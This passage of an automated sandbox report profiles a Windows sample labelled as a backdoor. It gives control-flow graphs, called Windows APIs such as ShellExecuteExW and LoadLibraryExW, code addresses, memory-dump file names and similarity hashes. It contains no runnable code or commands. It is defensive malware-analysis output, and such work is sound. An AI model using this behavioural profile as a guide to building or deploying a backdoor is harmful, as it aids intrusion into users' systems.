                                                      control_flow_graph 518 401f12-401f84 call 402da6 * 4 call 401423 call 405b40 531 401f8a-401f91 518->531 532 40292e-402935 518->532 533 402c2a-402c39 531->533 534 401f97-401f9a call 406992 531->534 532->533 538 401f9f-401ff1 CloseHandle 534->538 538->532 538->533
                                                      APIs
                                                        • Part of subcall function 00405B40: ShellExecuteExW.SHELL32(?), ref: 00405B4F
                                                        • Part of subcall function 00406992: WaitForSingleObject.KERNEL32(?,00000064,00000000,00000000,?,?,00401F9F,?,?,?,?,?,?), ref: 004069A3
                                                        • Part of subcall function 00406992: GetExitCodeProcess.KERNELBASE(?,?), ref: 004069C5
                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?), ref: 00401FEB
                                                      Strings
                                                      • C:\Users\user\AppData\Local\Microsoft\Windows\INetCache, xrefs: 00401F6A
                                                      • @, xrefs: 00401F8A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1260209781.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1260196137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260225233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.0000000000793000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260528232.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                      Similarity
                                                      • API ID: CloseCodeExecuteExitHandleObjectProcessShellSingleWait
                                                      • String ID: @$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache
                                                      • API String ID: 165873841-3426815298
                                                      • Opcode ID: 6aacd96ff37752c2e584ea35064cf87376a7c920f6258fea4879495fca53abbe
                                                      • Instruction ID: 50afd287f86dbb1b9840ce00b3b0add55affccdcf189c2d18f9fd219c9f0256a
                                                      • Opcode Fuzzy Hash: 6aacd96ff37752c2e584ea35064cf87376a7c920f6258fea4879495fca53abbe
                                                      • Instruction Fuzzy Hash: 15114971E042189ACB60EFB9DA49B8CB6F4AF04304F20447AE105F72C1EBBC8A459B18
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 540 406992-4069aa WaitForSingleObject 541 4069ba-4069bc 540->541 542 4069ac-4069b8 call 406923 WaitForSingleObject 541->542 543 4069be-4069d1 GetExitCodeProcess 541->543 542->541
                                                      APIs
                                                      • WaitForSingleObject.KERNEL32(?,00000064,00000000,00000000,?,?,00401F9F,?,?,?,?,?,?), ref: 004069A3
                                                      • WaitForSingleObject.KERNEL32(?,00000064,0000000F,?,?,00401F9F,?,?,?,?,?,?), ref: 004069B8
                                                      • GetExitCodeProcess.KERNELBASE(?,?), ref: 004069C5
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1260209781.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1260196137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260225233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.0000000000793000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260528232.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                      Similarity
                                                      • API ID: ObjectSingleWait$CodeExitProcess
                                                      • String ID:
                                                      • API String ID: 2567322000-0
                                                      • Opcode ID: 16e94b638c2cb02e7eef90cce34a41679e1e5b7c0e7ceec04fbe50ecc5462069
                                                      • Instruction ID: 612ea2665b0c92228eee6969d5dafab2c0b27363579004502bf6782fab43ad3e
                                                      • Opcode Fuzzy Hash: 16e94b638c2cb02e7eef90cce34a41679e1e5b7c0e7ceec04fbe50ecc5462069
                                                      • Instruction Fuzzy Hash: 5AE0D872600108FBDB009B54ED05E9E7FAEEB44714F110033FA05B6190C7B69E22DBD4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 546 401389-40138e 547 4013fa-4013fc 546->547 548 401390-4013a0 547->548 549 4013fe 547->549 548->549 551 4013a2-4013a3 call 401434 548->551 550 401400-401401 549->550 553 4013a8-4013ad 551->553 554 401404-401409 553->554 555 4013af-4013b7 call 40136d 553->555 554->550 558 4013b9-4013bb 555->558 559 4013bd-4013c2 555->559 560 4013c4-4013c9 558->560 559->560 560->547 561 4013cb-4013f4 MulDiv SendMessageW 560->561 561->547
                                                      APIs
                                                      • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                      • SendMessageW.USER32(?,00000402,00000000), ref: 004013F4
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1260209781.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1260196137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260225233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.0000000000793000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260528232.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                      Similarity
                                                      • API ID: MessageSend
                                                      • String ID:
                                                      • API String ID: 3850602802-0
                                                      • Opcode ID: 0f992e2ae6cf3b1b8dd96a4b6b0adf3515dff43e38b3359cc4322e8ed16e10f0
                                                      • Instruction ID: 637f0bbede897030ab690e2e99e2181d797c58f7d0d2aab6e1f53bdf2be6ce4b
                                                      • Opcode Fuzzy Hash: 0f992e2ae6cf3b1b8dd96a4b6b0adf3515dff43e38b3359cc4322e8ed16e10f0
                                                      • Instruction Fuzzy Hash: 9501F432624220ABE7195B389D05B2A3698E751314F10C13FF955F69F1EA78CC02DB4D
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 562 4068e7-406901 GetModuleHandleA 563 406903-406904 call 406877 562->563 564 40690d-40691a GetProcAddress 562->564 567 406909-40690b 563->567 566 40691e-406920 564->566 567->564 568 40691c 567->568 568->566
                                                      APIs
                                                      • GetModuleHandleA.KERNEL32(?,00000020,?,0040361A,0000000B), ref: 004068F9
                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00406914
                                                        • Part of subcall function 00406877: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040688E
                                                        • Part of subcall function 00406877: wsprintfW.USER32 ref: 004068C9
                                                        • Part of subcall function 00406877: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 004068DD
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1260209781.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1260196137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260225233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.0000000000793000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260528232.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                      Similarity
                                                      • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                      • String ID:
                                                      • API String ID: 2547128583-0
                                                      • Opcode ID: 6f78d3fdf53352f122fdb8e7e1f438bdfac4fae158339a91a146711bf240c1a4
                                                      • Instruction ID: 6423a29397ed7bff7b22ace80297d9bc35d616ea5f013efbaa2f78a15a639a79
                                                      • Opcode Fuzzy Hash: 6f78d3fdf53352f122fdb8e7e1f438bdfac4fae158339a91a146711bf240c1a4
                                                      • Instruction Fuzzy Hash: CEE08673504210AAE21196716E44C7773A89F89740316443FF946F2080D738DC359AAD
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 569 40600a-406036 GetFileAttributesW CreateFileW
                                                      APIs
                                                      • GetFileAttributesW.KERNELBASE(00000003,004030BD,C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe,80000000,00000003,?,?,?,?,?,0040385A,?), ref: 0040600E
                                                      • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,0040385A,?), ref: 00406030
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1260209781.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1260196137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260225233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.0000000000793000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260528232.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                      Similarity
                                                      • API ID: File$AttributesCreate
                                                      • String ID:
                                                      • API String ID: 415043291-0
                                                      • Opcode ID: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
                                                      • Instruction ID: 1030bc0f2bf25390ef9c6131bda9d6cfedcac9e68b753c15eded60bf4a570351
                                                      • Opcode Fuzzy Hash: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
                                                      • Instruction Fuzzy Hash: 5ED09E31254201AFEF098F20DE16F2E7BA2EB94B04F11552CB786941E0DAB15C199B15
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 570 405fe5-405ff5 GetFileAttributesW 571 406004-406007 570->571 572 405ff7-405ffe SetFileAttributesW 570->572 572->571
                                                      APIs
                                                      • GetFileAttributesW.KERNELBASE(?,?,00405BEA,?,?,00000000,00405DC0,?,?,?,?), ref: 00405FEA
                                                      • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405FFE
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1260209781.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1260196137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260225233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.0000000000793000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260528232.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                      Similarity
                                                      • API ID: AttributesFile
                                                      • String ID:
                                                      • API String ID: 3188754299-0
                                                      • Opcode ID: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                                      • Instruction ID: e4d3e829c0d5e7da9196b8d45c2199d6a51b20c6ab53065100e3d1aec4738abc
                                                      • Opcode Fuzzy Hash: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                                      • Instruction Fuzzy Hash: 4CD01272504130BFC2102728EF0C89BBF95EF64375B024B35FAA5A22F0CB304C638A98
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • CreateDirectoryW.KERNELBASE(?,00000000,004034FD,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,004037ED), ref: 00405ACE
                                                      • GetLastError.KERNEL32 ref: 00405ADC
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1260209781.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1260196137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260225233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.0000000000793000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260528232.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                      Similarity
                                                      • API ID: CreateDirectoryErrorLast
                                                      • String ID:
                                                      • API String ID: 1375471231-0
                                                      • Opcode ID: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
                                                      • Instruction ID: 96bb703f3db892353912e36940962cdd7e9d34b0f70b6f3c067145efd4a10b7e
                                                      • Opcode Fuzzy Hash: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
                                                      • Instruction Fuzzy Hash: 95C04C30344601AEDA105B219E48B1B7AD4DB50741F26853D6146F41A0EA788455DD3D
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004034BF,00000000,00000000,00403306,000000FF,00000004,00000000,00000000,00000000), ref: 004060A1
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1260209781.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1260196137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260225233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.0000000000793000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260528232.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                      Similarity
                                                      • API ID: FileRead
                                                      • String ID:
                                                      • API String ID: 2738559852-0
                                                      • Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                                      • Instruction ID: 9ce5220da9ed3c49ab8c05536da5923326b58a2142fda2ae973167115508ceb5
                                                      • Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                                      • Instruction Fuzzy Hash: 2DE08632140259ABCF119E518C00AEB376CFB05350F018472F911E2240D630E82187A5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,00403475,00000000,00793700,000000FF,00793700,000000FF,000000FF,00000004,00000000), ref: 004060D0
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1260209781.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1260196137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260225233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.0000000000793000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260528232.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                      Similarity
                                                      • API ID: FileWrite
                                                      • String ID:
                                                      • API String ID: 3934441357-0
                                                      • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                      • Instruction ID: ff7f98053b8daf8dc00d9e724bd7773b369301681fd057c4f0a19a08aea0fefc
                                                      • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                      • Instruction Fuzzy Hash: AEE0EC3225426AABDF10AF659C00AEB7BACFB15360F018437FA56E3190D631E83197A4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • ShellExecuteExW.SHELL32(?), ref: 00405B4F
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1260209781.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1260196137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260225233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.0000000000793000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260528232.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                      Similarity
                                                      • API ID: ExecuteShell
                                                      • String ID:
                                                      • API String ID: 587946157-0
                                                      • Opcode ID: 34af207f7f04f37b2a6a243a8c8041682423b78b35e6f682d2e1a111f695392f
                                                      • Instruction ID: 155326c85e208380d9db810c36285a9e1b4200be200639c8195ffcf147e959ee
                                                      • Opcode Fuzzy Hash: 34af207f7f04f37b2a6a243a8c8041682423b78b35e6f682d2e1a111f695392f
                                                      • Instruction Fuzzy Hash: BEC092B2000200EFE301CF80CB09F067BE8AF54306F028068E185DA060C7788840CB29
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403242,?,?,?,?,?,?,0040385A,?), ref: 004034D0
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1260209781.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1260196137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260225233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.0000000000793000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260528232.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                      Similarity
                                                      • API ID: FilePointer
                                                      • String ID:
                                                      • API String ID: 973152223-0
                                                      • Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                                      • Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
                                                      • Opcode Fuzzy Hash: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                                      • Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • CloseHandle.KERNEL32(FFFFFFFF,00403A3B,?), ref: 00403AFA
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1260209781.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1260196137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260225233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.0000000000793000.00000004.00000001.01000000.00000003.sdmpDownload File
